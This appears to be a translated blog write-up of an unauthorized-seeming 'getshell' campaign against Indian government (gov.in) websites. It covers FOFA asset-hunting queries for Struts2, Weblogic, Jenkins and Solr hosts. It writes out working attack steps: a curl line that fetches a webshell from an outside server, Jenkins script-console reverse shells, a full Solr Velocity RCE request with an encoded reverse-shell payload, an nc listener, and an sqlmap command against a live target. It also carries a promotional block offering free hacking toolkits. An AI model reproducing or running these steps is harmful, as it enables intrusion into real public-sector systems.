A fully exposed Red Hat penetration test [getshell]

0x01, information collection stage

Note: This information collection process mainly uses the FOFA network detection platform https://fofa.info/=

At the beginning of the collection, I was a little confused, and directly carried out a large-scale "gov.in" domain name collection

host="gov.in" && country="IN"

Haha 68,465 pieces of data, it takes off after thinking about it, but there is a problem, how to download to the local, the API of advanced users can only call and download 1w pieces of data, think about it

Try writing a script to see:

import pythonfofa
import csv

filename = "IN_domain.csv"

email = 'u_mail'
key = 'u_API_KEY'
search = pythonfofa.Client(email, key)
get_data = search.search('host="gov.in" && country="IN"', size=70000)
# print(get_data)

requests = [result[1] for result in get_data['results']]
print(requests)
# 打开CSV文件并设置写入模式
with open(filename, "w", newline="") as file:
    writer = csv.writer(file)

    # 遍历请求列表
    for request in requests:
        # 在控制台打印域名
        print(request)

        # 检测域名是否包含"http://"
        if not request.startswith("http://") and not request.startswith("https://"):
            # 如果不包含，则在域名前添加"http://"
            request = "http://" + request

        # 在域名后添加斜杠"/"
        request += "/"

        # 将请求和值"1"作为一行写入CSV文件
        writer.writerow([request, 1])

Yes, it must not run, set a breakpoint, and debug to see

It’s very good, it’s true that you can’t do 7w items directly, change your collection idea, collect mainstream frameworks and perform corresponding missing scans

FOFA rule statement for related vulnerabilities in mainstream frameworks:

Fastjson

app="Fastjson" && host="in" && country="IN" && status_code="200" && (port="80" || port="443")

Struts2

app="Struts" && host="in" && country="IN" && status_code="200" && (port="80" || port="443")

Log4j2

(app="Log4j2" && host="in" && country="IN" && status_code="200" && (port="80" || port="443"))

Others are similar, just follow the gourd painting.

The target site is almost collected, and it is the stage of vulnerability detection.

‍Help cybersecurity study, get a full set of information S letter for free:
① Mind map of cybersecurity learning growth path
② 60+ classic cybersecurity toolkits
③ 100+ SRC analysis reports
④ 150+ e-books on cybersecurity attack and defense combat techniques
⑤ The most authoritative CISSP Certification Exam Guide + Question Bank
⑥ More than 1800 pages of CTF Practical Skills Manual
⑦ Collection of the latest interview questions from network security companies (including answers)
⑧ APP Client Security Testing Guide (Android+IOS)

0x02, vulnerability detection and utilization

Struts2：

Directly take out a large-scale missed scan AWVS to detect batches of vulnerabilities:

The data took off directly on the first day, because the goal this time isgetshellDirectly ignore warnings for medium and low-risk vulnerabilities, and view high-risk vulnerabilities:

nice bunchStruts2Vulnerabilities, go directly to the tool:

Get an RCE (Remote Command Execution Vulnerability), remote writeshell, first use the tool to generate aAntsword (ant sword) shell in jsp format

Put the shell on a public network server, and then execute the command to view the web path:/var/tomcat9/pmrportal/ROOT/

direct execution

curl -o /var/tomcat9/pmrportal/ROOT/shell.jsp http://u_ip/antsword.jsp

Then the webshell tool Antsword can be connected:

There are still several vulnerabilities of the S2-045 that have been exposed. The getshell method is the same as above, and I will not describe it in detail ____________________________________.

Weblogic：

Very useful awvs, directly inject the memory horse into the tool:

Ice Scorpion connects to webshell:

There are several other vulnerabilities of the same type, and the method of getshell is the same, so I won’t outline them one by one.》》

(PS: At this time, it is already a little weak, and there is no point to manually test the upload)

Jenkins：

When other frameworks failed to gain anything in the middle, I went to browse the ocean of knowledge and saw a framework vulnerability ( Jenkins ) with a large number of unauthorized + RCE. Without further ado, go directly to FOFA:

(app="JENKINS" && title=="Dashboard [Jenkins]" && country="IN" && status_code="200") && (port="80" || port="443")

Looking at the 86 assets, there are dramas, and the number is not much. Direct hand test:

There is unauthorized access, visit the manager --> script page, and perform a command execution test:

println "ls -al".execute().text

There is command execution, try to reverse the shell:

println "bash -i >& /dev/tcp/ip/port 0<&1".execute().text

The server receiving the shell opens the port listening:

Excuting an order

It was found that no shell rebounded, and guessed that the reverse shell could not be executed on the web side, so the reverse shell command was written into the .sh file, and then executed to perform the reverse shell operation:

Write the following in the sh file:

bash -i >& /dev/tcp/ip/port 0<&1

Save it in an open web port, execute the following curl command in the jenkins service to remotely download the sh file:

println "curl - o /tmp/jenkins.sh http://u_ip:port/jenkins.sh".execute().text

Check whether the .sh file is obtained successfully:

println "ls -al /tmp".execute().text

Get the .sh file successfully, execute the file, and bounce the shell:

Turn on monitoring:

Execute the command to start the .sh file:

println "bash /tmp/jenkins.sh".execute().text

Successfully monitored the shell that came over, and won another one! Others did not exist without authorization, so no attempt was made.

Apache-Solr

I have nothing to do, I opened the library and read a few RCE recurrences, and on a whim, I opened FOFA:

country="IN" && app="Apache-Solr" && status_code="200" && (port="443" || port="80")

The data is not large, and then hand-tested, got three unauthorized (no need to log in):

authorized：

unauthorized：

After obtaining the unauthorized authorization, perform CVE detection:

visit /solr/admin/cores/, obtainname => music

Then splice the path /solr/music/config/to view the user configuration information:

Both true, you can directly use the payload disclosed on the public network to perform RCE,

GET /solr/music/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22whoami%22))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

Test whether it is out of the network:

Modify the execution command to

curl%20xtolsc.dnslog.cn

It can go out of the network and directly rebound the shell:

GET /solr/music/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2xxxxxx8xMDEuNDMuMTM5LjI0My81MDAwIDA%2BJjE%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end  HTTP/1.1
Host: ip
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

VPS enables port monitoring:nc -lvvnp 5000

I heard the shell that popped up, okay, I won another one, with root privileges.

Other bugs found

Reflected XSS

There is no difficulty in the specific test process, no need for bypass blacklist, test statement

<script>alert(1)</script>

SQL injection

There is no specific test for this type, and after the injection point is found, go directly to SQLmap to scan:

sqlmap https://******.gov.in/****/Validate.jsp --data "[email protected]&password=123456" --random-agent -t 10 -p password --proxy=http://127.0.0.1:7890 --dbms=mysql

Other vulnerabilities have also been found, but they are not the focus of this infiltration, so there is no focus to go deeper.

Penetration Summary

This test period is long, and the test targets are exposed to many points. It is a very interesting infiltration practice. It is a pity that we cannot devote ourselves to it when there are other things in the later stage.